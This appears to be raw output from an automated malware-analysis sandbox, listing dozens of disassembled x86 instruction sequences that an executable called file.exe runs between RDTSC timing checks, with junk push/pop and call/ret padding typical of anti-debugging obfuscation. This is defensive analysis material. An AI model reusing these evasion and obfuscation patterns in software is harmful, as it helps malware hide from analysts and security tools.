                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D8C82 second address: 5D8CAF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007F2398D03456h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F2398D03463h 0x00000016 popad 0x00000017 jng 00007F2398D0345Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7ED0 second address: 5D7F4C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+12458113h], ebx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 jmp 00007F239852C067h 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 cld 0x00000025 mov eax, dword ptr [ebp+122D0CC9h] 0x0000002b mov ebx, 0340600Fh 0x00000030 push FFFFFFFFh 0x00000032 mov edi, 1A0944F0h 0x00000037 nop 0x00000038 jno 00007F239852C076h 0x0000003e push eax 0x0000003f jng 00007F239852C060h 0x00000045 pushad 0x00000046 push esi 0x00000047 pop esi 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DAE25 second address: 5DAE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 jl 00007F2398D03456h 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9FC9 second address: 5D9FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DAE35 second address: 5DAE3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9FCD second address: 5D9FE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F239852C058h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DCCBF second address: 5DCCC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DBF2A second address: 5DBF3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F239852C05Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DEDBA second address: 5DEDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DEDBE second address: 5DEDE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C05Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F239852C05Dh 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0D8C second address: 5E0D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DCE3F second address: 5DCE43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DDF36 second address: 5DDF3B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DEFA6 second address: 5DEFC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F239852C056h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F239852C064h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFF9C second address: 5DFFA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DCE43 second address: 5DCE49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFFA2 second address: 5DFFA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DCE49 second address: 5DCE4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E1DE2 second address: 5E1DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DF075 second address: 5DF079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E1DE6 second address: 5E1DF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D0345Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E1DF7 second address: 5E1E0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C05Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E1E0C second address: 5E1E12 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E1E12 second address: 5E1E8D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007F239852C056h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F239852C058h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov di, ax 0x0000002a sbb ebx, 1341B77Dh 0x00000030 push 00000000h 0x00000032 call 00007F239852C062h 0x00000037 mov edi, dword ptr [ebp+122D364Dh] 0x0000003d pop ebx 0x0000003e and edi, dword ptr [ebp+122D1C9Ch] 0x00000044 push 00000000h 0x00000046 cmc 0x00000047 xchg eax, esi 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b je 00007F239852C056h 0x00000051 jmp 00007F239852C068h 0x00000056 popad 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0F18 second address: 5E0F1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0F1C second address: 5E0FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 jc 00007F239852C058h 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 nop 0x00000013 jmp 00007F239852C065h 0x00000018 push dword ptr fs:[00000000h] 0x0000001f clc 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F239852C058h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 mov di, si 0x00000044 cmc 0x00000045 mov eax, dword ptr [ebp+122D129Dh] 0x0000004b push 00000000h 0x0000004d push edi 0x0000004e call 00007F239852C058h 0x00000053 pop edi 0x00000054 mov dword ptr [esp+04h], edi 0x00000058 add dword ptr [esp+04h], 00000017h 0x00000060 inc edi 0x00000061 push edi 0x00000062 ret 0x00000063 pop edi 0x00000064 ret 0x00000065 jmp 00007F239852C05Ch 0x0000006a push FFFFFFFFh 0x0000006c cld 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F239852C068h 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0FC2 second address: 5E0FC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2028 second address: 5E2032 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F239852C056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2032 second address: 5E20CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D0345Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ebx, dword ptr [ebp+122D36F1h] 0x00000012 mov ebx, dword ptr [ebp+122D2521h] 0x00000018 push dword ptr fs:[00000000h] 0x0000001f mov bl, DFh 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007F2398D03458h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 00000019h 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 mov eax, dword ptr [ebp+122D0705h] 0x00000048 jmp 00007F2398D03463h 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push ebp 0x00000052 call 00007F2398D03458h 0x00000057 pop ebp 0x00000058 mov dword ptr [esp+04h], ebp 0x0000005c add dword ptr [esp+04h], 00000016h 0x00000064 inc ebp 0x00000065 push ebp 0x00000066 ret 0x00000067 pop ebp 0x00000068 ret 0x00000069 mov ebx, dword ptr [ebp+122D2135h] 0x0000006f nop 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 jnc 00007F2398D03456h 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E20CD second address: 5E20E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C05Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3D22 second address: 5E3D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2398D03460h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F2398D0345Dh 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jne 00007F2398D03465h 0x0000001b nop 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D2981h], eax 0x00000024 push 00000000h 0x00000026 jmp 00007F2398D03467h 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3D88 second address: 5E3D97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C05Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3D97 second address: 5E3D9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3D9D second address: 5E3DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E6CFE second address: 5E6D02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3EF4 second address: 5E3F1D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F239852C056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F239852C069h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3FDD second address: 5E3FF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D0345Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 587BDF second address: 587C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F239852C066h 0x0000000b jmp 00007F239852C05Eh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 587C09 second address: 587C21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2398D03462h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 587C21 second address: 587C3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C063h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE5E2 second address: 5EE5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2398D0345Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE5F3 second address: 5EE5FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F239852C056h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE5FD second address: 5EE615 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2398D03456h 0x00000008 jno 00007F2398D03456h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F2398D03456h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE615 second address: 5EE629 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C060h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE75D second address: 5EE782 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2398D03456h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2398D03469h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE8F9 second address: 5EE904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F239852C056h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F4DE1 second address: 5F4DF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F2398D03456h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F4DF5 second address: 5F4E1A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F239852C056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F239852C069h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FAA2C second address: 5FAA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9EE3 second address: 5F9EE8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FA210 second address: 5FA216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FA4DB second address: 5FA4EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F239852C05Ah 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FA4EC second address: 5FA4F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6002B1 second address: 6002B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 586032 second address: 586048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D03462h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FF132 second address: 5FF186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F239852C068h 0x00000009 ja 00007F239852C056h 0x0000000f jmp 00007F239852C060h 0x00000014 popad 0x00000015 jo 00007F239852C058h 0x0000001b push edi 0x0000001c pop edi 0x0000001d jmp 00007F239852C05Ah 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push ecx 0x00000026 jmp 00007F239852C05Ah 0x0000002b pop ecx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FF186 second address: 5FF18B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FF18B second address: 5FF193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FF740 second address: 5FF74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2398D0345Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FFA28 second address: 5FFA6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007F239852C072h 0x0000000e jmp 00007F239852C060h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jg 00007F239852C056h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FFA6E second address: 5FFA72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FFA72 second address: 5FFA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 je 00007F239852C056h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FFA81 second address: 5FFA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FFA8B second address: 5FFA93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FFC0B second address: 5FFC14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FFD64 second address: 5FFD68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FFD68 second address: 5FFD6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FFD6E second address: 5FFD79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 602477 second address: 602483 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2398D03456h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60574A second address: 605753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 609D2E second address: 609D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2398D03464h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 609D4B second address: 609D4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 609D4F second address: 609D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2398D03456h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 609EC2 second address: 609ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 609ECE second address: 609EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F2398D03462h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 609EED second address: 609EF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 609EF9 second address: 609EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60A065 second address: 60A06B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60AA5C second address: 60AA61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60AA61 second address: 60AA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F239852C056h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60AD30 second address: 60AD36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60AD36 second address: 60AD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB122 second address: 5AB142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F2398D03468h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB142 second address: 5AB153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F239852C058h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB153 second address: 5AB157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB157 second address: 5AB15B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60B19D second address: 60B1B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2398D03462h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60B1B3 second address: 60B1D8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F239852C056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F239852C062h 0x00000010 jo 00007F239852C056h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
